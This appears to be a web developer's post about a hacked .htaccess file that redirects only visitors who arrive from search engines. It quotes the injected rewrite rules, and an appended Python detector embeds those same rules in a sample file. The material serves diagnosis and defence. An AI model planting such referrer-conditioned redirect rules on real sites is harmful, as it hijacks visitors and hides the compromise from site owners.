Hacked .htaccess file: Redirecting visits from search engine referrals

During the course of managing websites, developers end up coming across a variety of hacks. I recently found one on a server that puzzled me, and it is one every web developer should be aware of.

The reported issue was that when the client’s business was searched on Google, and the user clicked the link, they were taken to an unexpected location. However, if the URL was entered manually or clicked from another location, everything was fine. Instinctively it felt like this wasn’t a problem with Google search. Normally I would expect a hack of this type to occur on the website software side (in this case WordPress), but there wasn’t anything out of the ordinary there either.

Thinking along the line of redirects, I checked the .htaccess file and that’s where I discovered this bit of inserted code:

RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteCond %{HTTP_HOST} <client-domain>.com$
RewriteRule . hacked-file.php [L,S=10000]

Clever. The hack is only activated when the user clicks through to the website from one of the common search engines (Google, Yahoo, MSN, AOL, Bing), something a site owner or manager wouldn't normally do, making it much less likely to be found quickly. It then runs a local script (hacked-file.php) that does the actual redirecting of the user.

Watch for other search engines being added to this list as they gain more popularity, especially privacy-focused ones.
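A small check for this pattern, added here as an example and not part of the original post: it scans an .htaccess file for a RewriteCond chain that tests HTTP_REFERER or HTTP_USER_AGENT against search-engine names and reports the RewriteRule that consumes it. The sample .htaccess, the example.com host, and the inclusion of DuckDuckGo in the name list are constructed assumptions; note that because the chain also matches the user-agent, it fires for search-engine crawlers as well as for visitors clicking through.

```python
import re

# Search-engine names from the injected chain; DuckDuckGo is added as an
# assumption, following the post's warning about privacy-focused engines.
SEARCH_ENGINES = re.compile(r"google|yahoo|msn|aol|bing|duckduckgo", re.IGNORECASE)
# Variables that make a rewrite depend on where the visitor came from or who is asking.
TRIGGER_VARS = ("HTTP_REFERER", "HTTP_USER_AGENT")

# Constructed sample: a normal WordPress block followed by the injected chain.
SAMPLE_HTACCESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteBase /
 RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
 RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
 RewriteCond %{HTTP_HOST} example.com$
 RewriteRule . hacked-file.php [L,S=10000]
"""

def find_referrer_redirects(htaccess_text):
    """Return one finding per RewriteRule whose preceding RewriteCond chain
    tests the referrer or user agent against search-engine names."""
    findings = []
    pending = []  # (line number, variable, pattern) of RewriteConds not yet bound to a rule
    for lineno, raw in enumerate(htaccess_text.splitlines(), 1):
        parts = raw.strip().split(None, 2)
        if len(parts) < 3 or parts[0].startswith("#"):
            continue  # blank lines, comments, and two-token directives such as RewriteBase
        directive = parts[0].lower()
        if directive == "rewritecond":
            pending.append((lineno, parts[1], parts[2]))
        elif directive == "rewriterule":
            # Apache binds every RewriteCond seen since the last RewriteRule to this one.
            hits = [c for c in pending
                    if any(v in c[1] for v in TRIGGER_VARS) and SEARCH_ENGINES.search(c[2])]
            if hits:
                findings.append({"rule_line": lineno,
                                 "target": parts[2].split()[0],  # script to inspect/remove
                                 "conditions": hits})
            pending = []
    return findings
```

Each finding names the rule line, the target script and the conditions that triggered it, so the chain and the script it points to can be removed together. The symptom itself can be reproduced without a search engine by requesting the site with a Referer header set to a search-engine URL and checking whether the response is a redirect.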